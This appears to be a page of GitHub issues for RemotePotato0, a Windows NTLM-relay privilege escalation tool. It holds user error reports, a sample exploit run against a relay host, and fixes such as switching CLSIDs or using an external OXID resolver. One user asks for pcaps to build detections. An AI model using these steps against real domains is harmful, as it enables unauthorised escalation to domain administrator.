antoniococo / remotepotato0
Windows Privilege Escalation from User to Domain Admin.
License: MIT License
When I use the program to test my machine, it throws this exception:
[!] Error. Trigger DCOM failed with status: 0x800706ba
How do I deal with it?
The RPC capture server in charge of grabbing the NTLMv2 response uses the hardcoded value 268 to hold the data. While no particular bugs were found on the tested Windows versions, it could have some bugs on Win11 and Server 2022.
The allocation should be managed dynamically with a malloc() call instead of using a local array of fixed size --> https://github.com/antonioCoco/RemotePotato0/blob/main/RPCCaptureServer.cpp#L168
Can you share the pcaps from your blog post please to help defenders generate detections?
Thanks in advance.
I am attempting to use this and got the following output on the user machine.
C:\Users\user\Documents>.\RemotePotato0.exe -r 10.1.1.69 -p 1111
[*] Starting the NTLM relay attack, remember to forward tcp port 135 on 10.1.1.69 to your victim machine on port 1111 before and to launch ntlmrelayx on 10.1.1.69!!
[*] RPC relay server listening on port 9997 ...
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 1111 ...
[*] IStoragetrigger written: 104 bytes
[!] Error. CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} not found. Bad path to object.
The user machine is Windows 2016 Standard (build:14393). Do I have to use a different CLSID?
Is this attack possible only when the domain admin is logged in with you on the local server? Or does it work even if the admin is only logged in on the Domain Controller?
On Windows Server versions prior to 2019 the JuicyPotato trigger (the one not requiring an external OXID resolution) does not work anymore. It seems that at a certain point in time MS backported the fix from Win Server 2019 to the older versions.
See --> https://twitter.com/decoder_it/status/1493916092493877248
A fix should be to use an external OXID resolver, as is already happening for Windows Server 2019.
Hello!
I've been reading the tech papers about this exploit and, admittedly, it caused my brain to leak out of my ears and onto my keyboard :-)
So I staged up a test DC, joined some Win10 machines to it and looked to recreate the exploit in action. It worked as advertised, which was awesome! However, I found that by default the average AD user doesn't have WinRM capability into anything in my server subnet, so I had to explicitly add my test user (Student10) to the Remote Management Users group. Once I did that and ran RemotePotato0, the fireworks flew:
So my newb question is: do you think in most AD environments this exploit is slightly less of a threat unless the admins have specifically configured a bunch of users/groups to have WinRM/SSH privs? Or is it an "I'm not doing it right" kind of situation where I can leverage RemotePotato0 in more common configuration scenarios?
Thanks!
Brian